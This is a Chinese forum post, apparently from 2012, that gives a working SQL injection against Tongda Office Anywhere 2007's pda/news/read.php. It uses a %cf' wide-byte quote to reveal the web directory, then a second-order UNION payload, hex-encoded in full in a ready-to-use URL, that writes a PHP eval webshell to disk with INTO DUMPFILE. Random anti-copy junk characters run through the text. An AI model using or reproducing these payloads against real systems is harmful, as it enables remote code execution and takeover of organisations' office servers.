找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2506|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
目前测试通达OA2007版本
; w7 H2 U* A5 N) n2 r+ O3 t+ V4 a: T+ Z+ s' e0 f
& t1 a; F; O! G- f4 F. C& K
Office Anywhere 2007 网络智能办公系统
. N4 N5 T+ l# L( K, B% n5 Y! J/ K
$ ]& w8 i7 l8 Y+ d/ Z. _( E6 Y* z& `http://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
2 S0 _1 X4 I$ G3 |
: d# ?% Y3 v) x5 i) q 4 G9 O# `+ A7 V. d. x4 _3 N- q9 r8 P
这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
0 }5 J+ n" E  P+ l8 |; C1 s9 x
( Z5 k" l# Q1 g: ?* n1 W$ h例如:SELECT * from USER where USER_ID='{$USERNAME}'  
& h9 F+ b9 }" N# m3 w+ z其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了: b7 C0 Q  ?$ g) I& L" [- p
( M; g/ l& e- ?( r3 B0 {" @* w+ N
这个时候我们是不是可以组合起来使用哪?+ _  [% E0 Z) b8 F" i2 Z8 _
+ R6 f/ R! x! M+ e) a! o( [
第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
+ r, D/ s' Q+ Punion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10) p4 K7 L( M5 A5 Q9 _5 b5 Z

( J1 q! b( ~  ?这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了
0 w  ~+ U: o0 i2 X7 h2 U
& i& C& o. \- O; b- N( ^& |  P那么问题来了,单引号可以吗?当然是不可以的,^_^。。。1 O2 R7 X! y* y3 p2 Z5 q- J
/ ?1 \1 @3 v, R
那么我们用字符串格式带入进行hex编码# ^# T9 Q, S" e# T4 ~

# a" E' }9 ^' w7 \& x7 H, h7 i' y%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
- f. S3 C( O2 F+ r  f# L  c! K
; h6 H3 s" a# w; Z% a# H( Q测试ok,获取oa的webshell
: C, e' p) b0 w1 g- t) P; s" B% z
& a4 T* S1 c9 G* O$ a
- q/ x2 A/ |( b, f$ Wpda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23+ n! S' ]9 Q5 `( P. U9 Q+ T
直接getwebshell
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表